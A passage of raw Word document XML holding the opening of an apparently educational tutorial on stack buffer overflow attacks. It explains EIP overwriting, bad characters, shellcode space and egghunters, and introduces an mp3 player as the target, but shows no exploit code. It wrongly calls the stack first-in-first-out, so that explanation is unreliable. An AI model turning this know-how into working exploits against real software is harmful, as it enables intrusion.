              <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Buffer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="187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B127F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Overflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00164B2A" w14:paraId="7ED58484" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="922" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B3D5AB"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7F72A3D0" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="933" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B3D5AB"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6C03501B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B3D5AB"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="56250B3A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="913" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B3D5AB"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="662C8DCE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="984" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B3D5AB"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5648FA97" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="946" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B3D5AB"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="48C25C21" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="927" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B3D5AB"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="63553FB1" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="939" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B3D5AB"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5879641B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="940" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E59CA4"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="440254D9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="933" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E59CA4"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="287DD808" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:keepNext/>
              <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6049C572" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Ref71473224"/>
      <w:bookmarkStart w:id="3" w:name="_Toc71564037"/>
      <w:r>
        <w:t>Figure 1- Buffer Overflow Example</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="09288C3F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The most common type of buffer overflow attack, and the one that will be demonstrated in this tutorial, is a “Stack overflow attack”. This involves overflowing the buffer where the process stack for the program is stored. The stack works in a First </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>In</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> First Out (FIFO) manner. This is important to note as it means that the first command sent to the application will be the first one executed. This means that a linear piece of code can be sent to the application and it will work its way through the exploit. However, there are difficulties in implementing these types of attacks. Such difficulties mainly center around the need to understand exactly how and where the program is using memory. However, if this can be determined then there are few limits to what this exploit can be used for (Watters, 2021).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4394"/>
        <w:gridCol w:w="4966"/>
      </w:tblGrid>
      <w:tr w:rsidR="00164B2A" w14:paraId="08F85CA2" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="2839"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4394" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7398FA97" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">To manipulate the stack into running the code it has been given, the Extended Instruction Pointer (EIP) will first have to be located. This is what tells the program what on the stack needs to run next. The ability to fill the EIP with a custom location is essentially what allows this exploit to work, as EIP can be manipulated into pointing to where the shellcode to be executed has been injected, as seen in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> REF _Ref71473348 </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Figure 2 - EIP Example</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>. (Bradshaw, 2021)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4965" w:type="dxa"/>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2442"/>
              <w:gridCol w:w="2298"/>
            </w:tblGrid>
            <w:tr w:rsidR="00164B2A" w14:paraId="4B28A5AD" w14:textId="77777777">
              <w:trPr>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26B6A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
                  <w:pPr>
                    <w:pStyle w:val="Standard"/>
                    <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>Normal Operation</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="23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FA562" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
                  <w:pPr>
                    <w:pStyle w:val="Standard"/>
                    <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>Buffer Overflow</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00164B2A" w14:paraId="13C3ACF5" w14:textId="77777777">
              <w:trPr>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tcPr>
                <w:p w14:paraId="7168A819" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
                  <w:pPr>
                    <w:pStyle w:val="Standard"/>
                    <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>Expected Input</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2303" w:type="dxa"/>
                  <w:vMerge w:val="restart"/>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14:paraId="5705C782" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
                  <w:pPr>
                    <w:pStyle w:val="Standard"/>
                    <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>Junk input to overwrite content</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00164B2A" w14:paraId="7F5586CE" w14:textId="77777777">
              <w:trPr>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tcPr>
                <w:p w14:paraId="54CEE79A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
                  <w:pPr>
                    <w:pStyle w:val="Standard"/>
                    <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>Program Variables</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2303" w:type="dxa"/>
                  <w:vMerge/>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14:paraId="2097EC6B" w14:textId="77777777" w:rsidR="00AD2FFF" w:rsidRDefault="00AD2FFF"/>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00164B2A" w14:paraId="72C47457" w14:textId="77777777">
              <w:trPr>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F21870C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
                  <w:pPr>
                    <w:pStyle w:val="Standard"/>
                    <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>EIP</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2303"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144694BB" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
                  <w:pPr>
                    <w:pStyle w:val="Standard"/>
                    <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>Location of shellcode</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00164B2A" w14:paraId="5079AE10" w14:textId="77777777">
              <w:trPr>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5B02676" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
                  <w:pPr>
                    <w:pStyle w:val="Standard"/>
                    <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>More Variable</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2303"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1C07CA0" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
                  <w:pPr>
                    <w:pStyle w:val="Standard"/>
                    <w:keepNext/>
                    <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
                    <w:rPr>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:lang w:eastAsia="en-US"/>
                    </w:rPr>
                    <w:t>Shellcode</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="67176E89" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Caption"/>
            </w:pPr>
            <w:bookmarkStart w:id="4" w:name="_Ref71473348"/>
            <w:r>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:bookmarkStart w:id="5" w:name="_Toc71564038"/>
            <w:r>
              <w:t>Figure 2 - EIP Example</w:t>
            </w:r>
            <w:bookmarkEnd w:id="4"/>
            <w:bookmarkEnd w:id="5"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B0664AE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>There are two other major considerations that if ignored may cause significant problems if not accounted for when preforming this exploit. The first of these is character filtration, sometimes referred to as “bad characters”. This is important because if the program strips some of the characters, then the shellcode will likely be incomplete and not run successfully. The other consists of the available space for injecting shellcode. Only with sufficient space can an exploit be successful. However, there are some ways for maximizing the available space to ensure that the exploit is successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F513907" w14:textId="43A0935A" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">This tutorial will first explain the process of enumerating the application, including locating the EIP, discovering the available space and determining the filtered characters. It will then go through an example of how to carry out a basic buffer overflow attack on an unprotected system. Then, it will explain how to create a more complex payload that will work based on the same principles. The next stage is an analysis of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>egghunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code. Essentially, this will show how to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maximise</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the available space in the buffer in case there is not enough space left for shellcode. The last stage is a demonstration of how to carry out the attack on a system w</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>ere countermeasures are deployed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A05CF3B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc71563996"/>
      <w:r>
        <w:t>Application</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9468" w:type="dxa"/>
        <w:tblInd w:w="-108" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2894"/>
        <w:gridCol w:w="1603"/>
        <w:gridCol w:w="4971"/>
      </w:tblGrid>
      <w:tr w:rsidR="00164B2A" w14:paraId="38DF4D24" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1309"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4497" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7BEBF6DA" w14:textId="0FC326FF" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>This application is an mp3 player that can be loaded with music files and has a host of control options.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="266A0308" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="236" w:line="264" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">By right clicking on the application it is possible to see all the controls for the application including the ability to add music, add playlists, add skins, control the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>music</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> and see more options for the application.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C030ADE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
